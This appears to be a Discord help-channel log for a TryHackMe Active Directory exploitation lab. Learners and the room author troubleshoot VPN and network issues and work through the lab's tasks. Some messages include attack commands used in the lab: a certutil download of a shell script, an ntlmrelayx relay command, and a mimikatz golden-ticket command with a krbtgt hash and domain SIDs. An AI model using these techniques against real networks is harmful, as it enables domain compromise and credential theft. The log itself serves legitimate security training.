#exploiting-ad

I am using verion 4.0.2. But nevermind, I just collected the json files myself

Super cool network so far btw

Import should work with that. Just a note you should not drag and drop the json files but rather the entire zip itself?

Glad you are like it

I didnt know I could D&D the zip file.

Let me try that

Hope that works. The results were captured with the latest version of SH (v4), so they should be fully importable

Do not seem to work hmm. I collected with Bloodhound.py commit 0b82612b124dfd48fd66b66ee0c2c10a243f8e6e (which is like 1 year old lol), that worked

No clue why it doesn't work on your version. Haven't had complaints on v4 before. Might just be a weird outlier.

I just pulled my Bloodhound to current master, still not working. Whatever, as long as it works with my collected jsons its fine lol

In Task 6 I can not edit the given GPO. I have RDPed as both the initial user and the t2 admin I compormised, i can use dir \\za.tryhackme.loc\sysvol and get the new shell to open mmc but the edit option is greyed out.

Read the task carefully. You can also verify this with bloodhound, but the account that has the permissions to modify that GPO is the account you find in the Keepass file.

Check this bloodhound diagram. So you RDP in with your low-privileged account, use runas to inject the SVC account, and then open MMC to modify the GPO.

I was typing the wrong password due to typing mistake. Room completed.

I always get an error in this part. What is a leap of faith?

ok something is not right I would like to work on the room from my own attacking machine and the vpn connection is not working, how can I get support?

I'm not doing anything wrong, the openvpn file is not available

Can you give a bit more context please? Are you getting a 404 when you download your VPN file? Have you regenerated your VPN file?

I'll give you screenshots hold on

even after regenerating it, doesnt work

So you don't need to do the print spooler attack. You already have admin access on THMSERVER1 with what you did in the last task. It is however good to still learn about the print spooler attack.

The issue however is that once one use runs the attack wrong, it will kill the entire print spooler service, meaning no one else can attempt the attack. For this reason, we made task optional, so you can continue to the next task if it fails for you. A network reset would bring the print spooler service back online if you really want to try it. But at least you can continue the network should it fail for you

Yeah known issue by the frontend team. Can you please send me your subnet in the network diagram? I'll report it for the network so support can get it sorted. Might just take a bit of time since they won't be online for a couple of hours so sorry about that

how do i get the subnet?

i dont know what you mean

Go to the room page: https://tryhackme.com/jr/exploitingad

Screenshot the network diagram

this

Jip that one. I've forwarded it to support. Will let you know once it is sorted. Sorry for the delay

ty

Fix has been applied. You may have to reset the network, but it should be working now. Please just also regen your VPN

hello, don't know if this is the right room to ask this question, but i want to know what is the correct order to do the newly released AD networks ?

Hey there, order should be:

• AD Basics (if you are new to AD)
• Breaching AD
• Enumerating AD
• Lateral Movement and Pivoting
• Exploiting AD
• Persisting AD (Coming out this week)

Thank you 💪 💪 💪

Gave +1 Rep to @glacial stream

hey guys, I've started to walk through Exploiting AD lab 2nd time (it was reseted and stopped recently) and noticed that members of IT support seems to have RDP access to THMSERVER2 straight from beginning, and THMSERVER2 has GenericAll over THMSERVER1, so exploiting Users/ GPOs part can be actually skipped if you want to have speed-run over network, am I right?

@glacial stream , this is greatest lab series I've passed over last year, thank you!

Gave +1 Rep to @glacial stream

Thank u for answer! ❤️

Gave +1 Rep to @glacial stream

Hey @real mesa ,

Glad you are enjoying the network series 🙂

So with these networks you can speedrun anything. You can even pop the DC from your first low-privilege access. But then you lose out of the learning opportunity. These networks are not CTFs in the sense that it is who can compromise them first, but more a walkthrough for you to learn new things. So users are more than welcome to speedrun, we won't police it, but they will lose out on the learning opportunity.

In terms of what you are describing, there are two ways to compromise THMSERVER1. You can either use the constrained delegation or you could use the Print spooler for relaying the machine account of THMSERVER2.

For compromising THMSERVER2, the intended path is to first compromise the AD user and then perform the GPO, but once a user in the network performs the GPO exploit, it will open that path up for everyone else. If you want to do it completely from scratch, you will need a network reset.

However, the nice thing is the AD user exploit you have to do to get the flags, since the flag is embedded in the keepass file, for which you can only get the key by keylogging that local user, so that creates a nice little gate to ensure users explore that task.

All in all, for all of these networks you will be able to cheese them. Heck, in the persisting AD one coming out this week we give you the DA credentials! But if a user only does this to get the points, then I think they are missing the point of these networks. So my recommendation is to take your time, work through the content and hopefully learn something new 🙂

yup totally agree here, its worth to learn all the techniques because in real life scenarios there might be not so much possible vectors 🙂

lemme check how to get DC from 1st low-priv user though 😅😆

Hey, wonder if someone can help me, get errors when importing kirbi tickets for trevor : File: 'TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0x00000002)

hey @storm coral , it means tkt is not in the right folder

if u dont want to state absolute path for it - just move tkt next to mimikatz.exe/Rubeus.exe

Yeah i just realised after i posted, lol, thanks, sorry to bother

np 😉

BTW, is there any lab/network which covers AV evasion specifically for AD pentest? I've heard that even opening cmd.exe may trigger alert on Blue Team side if network have good AV in place

Maybe https://tryhackme.com/room/monitoringevasion ?

why can't i download shell.ps1?

You're using the wrong ip address. run ip a on the attackbox and look for the vpn connection. I think it'll say "exploitingad" as the connection name. You want that IP address, as thet's your VPN IP to connect to the AD network.

thx for help

How can I upload this database to attackbox?

gonna need more specifics. What task, and what are you trying to do?

this question

does SCP work? I can't remember off the top of my head.

I guess I couldn't find the right database. I will find it.

yeah i did xD

Hey guys, klist shows cached tickets for trevor but can't get PSSession, anyone got any ideas : New-PSSession : [thmserver1.za.tryhackme.loc] Connecting to remote server thmserver1.za.tryhackme.loc failed with the
following error message : A specified logon session does not exist. It may already have been terminated. For more
information, see the about_Remote_Troubleshooting Help topic

did you use that syntax for the command? or the syntax in the room? New-PSSession -ComputerName thmserver1.za.tryhackme.loc

Forgot to reply

@lucid pagoda I used New-PSSession -ComputerName thmserver1.za.tryhackme.loc and did get a session, but then lab dropped had to start again went through lab again to same point but got that syntax. Do I have to wait for this all to be reset?

Possibly, I know some people have been seeing some site errors

Oh okay, I've marked for a reset and hopefully get done overnight.

@lucid pagoda looks great, thank you!

Gave +1 Rep to @lucid pagoda

I'm on task 5 of Exploiting AD. For some reason, I can't get my shell.ps1 file over to thmserver1 using the provided command: certutil.exe -urlcache -split -f http://[my attackbox ip]/shell.ps1

bah - nevermind ... just scrolled up a bit and saw someone else was having the exact same issue. I was using the wrong IP address.

Can anyone help me setting up connection

im not able to connect to network

VPN is getting reset

Show a screenshot please.

It keeps on getting restarted

Have you tried to regen your config?

yes

i have downloaded it

And that's the new one?

yes

i redid it

still the issue is same

Do you have two open?

Or an attackbox?

openvpn

Can you do ip a s and see how many tun* you have?

their is no tun*

Any exploitad ?

Isn't that the cipher issue?
As far as I can see from the screenshot.

D'oh.

i tired to connect with HTB it got connect

its giving issue with THM

This isn't htb though.

yeah is know

i trying this in freshly istalled kali

You need to go to #site-support and do the steps in the first pinned post.

Thanks buddy finally got connected its was openvpn issue

Gave +1 Rep to @wintry oriole

Happy hacking.

+rep @hollow oak

Gave +1 Rep to @hollow oak

I'm still stuck with the room Exploiting AD... I can't get the .ovpn file... I already reported this last week, first time I have an issue like this... Hope it gets resolved soon

I'm having a similar issue. The ovpn file is not connecting and can't regenerate it or download again

We did resolve that issue in the network you were having? If you still have the same issue let me know. But it might be good to leave the room and rejoin, just in case

I am working through the first 3 tasks right now on YouTube. Feel free to join along and we can learn this room together 🙂
https://www.youtube.com/watch?v=KfbxgD9XK30&ab_channel=TylerRamsbey

How do I leave the room?

There is a cog at the top right.

Click the cog.

Did it

Got into the same room

Is yours not working? (subnet) ?

No

Not even the attack box is getting the subnet

reset?

wait the attackbox works with networks now????

It has done since the start of the new rooms.

oh that is nice

Hey all -- I am live on Twitch right now to continue working through this room. The creator of the room - @glacial stream - often joins and offers some great tips/teaching as well. I'll be streaming for the next 2 hours or so. Feel free to stop by and we can work through the room together 🙂
https://twitch.tv/hack_smarter

Can you download your VPN or still that issue? We did a reset and verified that VPN downloads work. If that still fails for you, can you send me your subnet?

It auto-connects via your openvpn profile if you start it in a network room. If you have multiple vpn network profiles it sometimes gets a bit confused, but generally works

Also to combat this, we have started to name the adapters of the VPN tunnels. Meaning you can search for the adapater name. Exploiting-AD's adapter name is exploitad. So easy to know which adapter is which network 🙂

.

Would it be possible to get the 10.200.83.x Exploiting AD network reset? The "Network State" has been "Resetting" since I joined the room almost 24 hours ago.

I've been enjoying this room - I stopped halfway through and realised I presumably have to start the path of escalation again from scratch? No problem to re-enforce my learning but I'd like to be aware this time I can't stop haha.

Just checking, Have you left and rejoined the room/refreshed?

Yes, more than once. On the attackbox no "exploitad" interface is found, either. Manually pinging the network doesn't work either.

guessing it also isn't showing up in the /access page then? Sounds like it doesn't think you're in the room if that's the case. I'll see what we can troubleshoot.

Thanks!

Can you confirm what you see at https://tryhackme.com/access?type=networks ? (If exploiting AD is listed)

It looks like this was the same network that someone else was having trouble with yesterday...
#exploiting-ad message

Yes, "Exploitingad" shows on the network access page.

Never tried connecting with my own VM, but I could if you would like me to?

Might be useful for troubleshooting if you can, but i've also passed it on for it to be looked at.

Yup, will do.

Ok, when I try to download the config file for network access the page errors out. I regenerated twice and the same thing happens.

404 I assume?

Yes, 404.

Gotcha, I'll let you know when something changes with it.

Great, thanks!

flag3.txt is not existing on THMSERVER1

za\t2_ross.bird@THMWRK1 C:\Users\Administrator.ZA\Desktop>dir
Volume in drive C is Windows
Volume Serial Number is 1634-22A9

Directory of C:\Users\Administrator.ZA\Desktop

07/08/2022 02:09 PM <DIR> .
07/08/2022 02:09 PM <DIR> ..

and I cant get the remote shell to be working with:

python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"10.200.83.201" -debug

Looks like you are running dir on THMWRK1 not THMSERVER1?

You will need to provide more information here. But the print spooler attack is unstable in the sense that one user can kill the service for everyone, which is why there is the note that says you can continue and come back to it.

You are totally right mate! me who got lost there in all the hacking 😄

Great room! totally got the servers wrong there for a while which f up things 😄 Thanks @glacial stream for pointing out the direction 😄

Gave +1 Rep to @glacial stream

Is this error because the server needs a reboot? * File: 'TGS_t1_jay.wilson@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m
_file_readData (0x00000002)

Seems to happen regardless of which user I try. * File: 'TGS_t1_duncan.moran@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': ERROR kuhl_m_kerberos_ptt_file ; kull_m_file_readData (0
x00000002)

Hi @glacial stream it seems like this network is down : 10.200.19.101

Can you cat /etc/resolv.conf ?

FYI the network wasn't started just now; not sure if you checked this at the time...

I am still getting this error today after a reset, not entirely sure what's going on

I know the network isn’t started just now, I was in the ssh session & suddenly network went down

After the network reset it's working fine now

Network 10.200.83.101 is stuck at "Resetting" for few hours.

@grave loom

Ignore ping — the issue was resolved. My apologies

Any update on the 10.200.83.x network? It has been more than 48 hours that the "Network State" has been "Resetting".

Another method for task 3 would be to use the credentials after dumping lsass to create a service ticket with impacket and get access that way

My apologies for the delayed response, I took a break for a week 🙂

only check one thing,

you're using the password so uncheck the key

okaaaay

Thanks

first time using keepass

I tried using "New-PSSession" for task 8 when trying to get the flag but I kept getting "Permission Denied". Is it because remote sessions are not allowed on the root domain?

Also, maybe Im misunderstanding this but we want those two SIDs because 1) We are pretending to be a valid DC to the root domain and 2) We use the EA group SID because we want to become a "member" of this group in a way?

What am I doing wrong in Task 8? ```mimikatz # kerberos::golden /user:Administrator /Domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
User : Administrator
Domain : za.tryhackme.loc (ZA)
SID : S-1-5-21-3885271727-2693558621-2658995185-1001
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-3330634377-1326264276-632209373-519 ;
ServiceKey: 16f9af38fca3ada405386b3b57366082 - rc4_hmac_nt
Service : krbtgt
Lifetime : 7/9/2022 8:32:23 PM ; 7/6/2032 8:32:23 PM ; 7/6/2032 8:32:23 PM
-> Ticket : ** Pass The Ticket **

• PAC generated
• PAC signed
• EncTicketPart generated
• EncTicketPart encrypted
• KrbCred generated

Golden ticket for 'Administrator @ za.tryhackme.loc' successfully submitted for current session```

It's giving my Unauthorised Access when trying to view the RootDC

Is the network started? start with first just pinging the hosts. If that works try nslookup za.tryhackme.loc <DC IP to verify DNS is alive. If both of those work, revisit your DNS configuration please

If root owns it, you must run KeepassX as root as well, else it will fail to open the DB

The sid you specify in /sid: should be the SID of the actual domain controller machine account in the child domain. The extra sid is the SID of the EA group in the parent domain. So with these two combined, your EA golden ticket should work.

I'm not sure if the golden ticket would automatically work for a PS-Session, you may have to generate a TGS for the HTTP and WSMAN services. A simpler approach to complete the task would be to use the dir command to access the file system of the RootDC

How are you trying to access the RootDC? On which machine are you performing these steps?

i was able to get the flag I was just curious on why ps-session wouldnt work in this case because it was working on thmdc.za.tryhackme.loc and the sid question was more about why these two sids just to make it a little clearer for myself

Mmm, it might be that PS-Session automatically gets a TGS based on the SID and not the extra SIDS? I'm not entirely sure why it would not work, but that would be my guess. So you would have to do a bit more work from that perspective to get the correct TGS for PS-Session on ROOTDC.

Ok I think I see what you mean, I can look more into that with the SID and PSSession

Oh I was doing it on THMSERVER2 still, as I'd just done the certificates there. When I opened a pssession on thmdc it didn't have mimikatz so assumed it was to be done elsewhere.

Out of interest, where you doing PS-Session with the IP or the DNS hostname?

DNS

Mmm, yeah then it was using kerberos. So that was not the issue. Something to play around with and see how you can get it to work 🙂

It was like PS-Session -ComputerName thmdc.etc

It might not make the biggest difference, but I've had strange cases where it works best for me to do the PTT on THMDC itself. Passing tickets can sometime do weird things, might be good just to run klist to see what current active tickets you have since some might interfere with your golden ticket

Yeah that would invoke Kerberos authentication, which should work with the golden ticket. I'll investigate a bit somewhere and see what additional step is required

There's 5 tickets, presumably because I kept trying it. All variations of this #3> Client: Administrator @ ZA.TRYHACKME.LOC Server: cifs/thmrootdc.tryhackme.loc @ TRYHACKME.LOC KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 7/9/2022 20:59:14 (local) End Time: 7/10/2022 5:59:32 (local) Renew Time: 7/16/2022 19:59:32 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: THMROOTDC.tryhackme.loc

Sounds good!

I'd suggest flushing those. Might be having some conflicts there. I'm not in front of my pc so can't look for the command, but just restarting your SSH session might work.

Hm, I did again and had the same thing (generated 5 tickets) so did Powershell as Administrator in RDP (just trying random solutions) and it worked.

These rooms are pretty amazing btw, very well explained, you must have an exceptional understanding of Active Directory.

I'll probably run them all a couple of times just to make sure it sinks in. Lucky we have access to this resource!

Welp, glad that worked at least!

Glad you like them and can use them as a reference point! Glad you like the explanations as well.

I'm by no means an AD expert. These rooms feature techniques I've learned over the last couple of years on assessments but honestly this is the tip of the iceberg. It is such a massive attack surface that you can spend a good amount of years and still not even scratch the surface.

Hopefully these rooms create a good starting point to learn AD and then inspire others to explore on their own and hopefully share their findings with the rest of us so we can all learn. SpectorOps with their Active Directory Certificate Service research is such a prime example of this. Hopefully we get more of these in the years to come! 🙂

There's such incredible depth to it all, it's amazing how complex it is. You manage to explain the techniques well, usually a sign that someone has a great understanding of what they're doing!

Thanks for the kind words. Remember to pay it forward when you learn something new, then it will be your turn to teach others 🙂

Gave +1 Rep to @spring bridge

Can you check again? I brought this up that day, so I'm assuming it's fixed now, otherwise i'll chase it?

All good, now. I think the network access finally expired and I was able to join a new network. Thanks.

Gave +1 Rep to @lucid pagoda

Network 10.200.83.101 is still stuck at "Resetting" for few days, can someone please check?

Network should be online, can you perhaps verify somewhere today?

Hey, can you please DM me your THM username so we can inspect the network?

Isn't impacket psexec now likely to be caught by AV ? I think I've heard something like that on a ippsec video

If someone could enlight us

Yeah it is, luckily this network has a pure AD exploitation focus, so no AV installed here, even Windows Defender 🙂

Should not be enabled no. All the other powershell scripts that should be blocked like powerview does go past. Not sure why that specific powershell script was being finicky, but I had it where if I did powershell -c "script.ps1 from a cmd.exe window it would fail, but when I actually go into powershell, it would work.

huh wut, I have ssh into one of the Tier 2 Admins on Task 2 but can't access Administrator folder, access is denied ? Am I stupid or ?

oh wait

I'm stupid maybe hold on

ok I was stupid indeed, I understand the mistake I did

If it became unresponsive it is probably the network that just went to sleep. There is a frontend bug where if the network timer runs out and you click extend instead of refresh the page to click start, it bricks the network. You can solve this by using inspect element to reenable the Start button and press it and your network should come back online. The team is aware of this and working on a fix

Gave +1 Rep to @glacial stream

Thanks for the update! I'll keep this in mind if others ask. Glad you are liking the series 🙂

Gave +1 Rep to @violet condor

Been like this for a good 40 minutes, am i missing something?

What is your subnet in the network diagram?

83

Can you please DM me your username? There seems to be a network conflict between this network and a wreath network that needs to get sorted but the team will need your THM username to investigate

hello, anyone else has DNS connection timeout issue through openvpn ?

This will be crazy.

Try nsloolup in root.

nsloolup

Changed nothing and it's working now 🤨

Sometimes it won't display straight away.

I found that when I was doing it, it wouldn't do nslookup unless I was in root for about 20 mins

Hello everyone, anyone else has the network stucks in resetting status ?

I can not access the network too, it keeps resetting...

I've reported this network. I think we are going to kill the subnet with fire next since this specific one keeps giving us issues. Can you click on the gear icon next to Start AttackBox, click leave room, then wait an hour and then rejoin the room, hopefully it drops you into a different subnet while we fix this subnet. Sorry for the inconvience

https://tenor.com/view/funny-kill-it-with-fire-gif-5874326

Should be solved now, you might just have to leave the room and rejoin it

Should be solved now, you might just have to leave and rejoin the room

seems broken again

Network is reporting stable from the VPN server:

ubuntu@ip-10-200-83-250:~$ nmap -p22,3389 10.200.83.100 10.200.83.101 10.200.83.201 10.200.83.202 10.200.83.248 -Pn

Starting Nmap 7.60 ( https://nmap.org ) at 2022-07-14 16:47 UTC
Nmap scan report for ip-10-200-83-100.eu-west-1.compute.internal (10.200.83.100)
Host is up (0.00084s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap scan report for ip-10-200-83-101.eu-west-1.compute.internal (10.200.83.101)
Host is up (0.00044s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap scan report for ip-10-200-83-201.eu-west-1.compute.internal (10.200.83.201)
Host is up (0.00052s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap scan report for ip-10-200-83-202.eu-west-1.compute.internal (10.200.83.202)
Host is up (0.00074s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap scan report for ip-10-200-83-248.eu-west-1.compute.internal (10.200.83.248)
Host is up (0.00073s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
3389/tcp open  ms-wbt-server

Nmap done: 5 IP addresses (5 hosts up) scanned in 2.24 seconds

thanks, i'll recheck my box

i'm stuck on the .60 subnet

@velvet hawk Did you try leaving the network and rejoining?

how long do we have to leave the room for a new subnet?

click leave room, then wait an hour and then rejoin the room, hopefully it drops you into a different subnet

ok, I'll try that, thanks!

Gave +1 Rep to @surreal python

what a great room, thanks @glacial stream !

Gave +1 Rep to @glacial stream

@glacial stream typo SpecterOps

For those interested, here is a 3-part series where I work through this entire room. @glacial stream was online with me for most of the streams offering advice and tips. Enjoy!
Exploiting AD (Part 1) -- https://youtu.be/KfbxgD9XK30
Exploiting AD (Part 2) -- https://youtu.be/ezdDMkMyHVM
Exploiting AD (Part 3) -- https://youtu.be/5tVDVptZH_w

I have now covered completely via video Enumerating AD, Breaching AD, Lateral Movement, and Exploiting AD. I'll be starting persisting AD on stream tonight 🙂

Thanks for all these AD rooms they are awesome @glacial stream

Gave +1 Rep to @glacial stream

Thanks for reporting, will get it fixed 🙂

Gave +1 Rep to @quiet coral

Glad you liked it! 🙂

Glad you liked it!

Hey @glacial stream I'm thinking of setting up the GOAD Lab for on-demand AD breaking haha. Do you think an old i5 laptop with 8gb of ram would cope? It's 5VMs requiring 1gb RAM per. I've no idea how intensively these things run.

You should be able to cope. Depends on how much ram the system uses at idle. So for example, run those 5 VMs but please don't run Chrome as well 😂

My VMs usually use 2 Gb of RAM instead of 1, else you can experience quite a bit of performance degradation, but I'd honestly give it a go! 🙂

It'll just be running some super low resource flavour of Linux and the 5VMs, otherwise it'll be doing nothing.

I used to like crashbang++ but it's something else now. Will give it a go and see how they work.

Good luck there!

responder

yes, that is indeed a thing that exists,

can i get a reeeeeset

i just got myself fail2banned

Is there anyone who can help me to Exploit and Escalate this Windows machine, please? I am still a newbie

This channel is for the Exploiting AD room on THM. Please go ask in #general or another channel.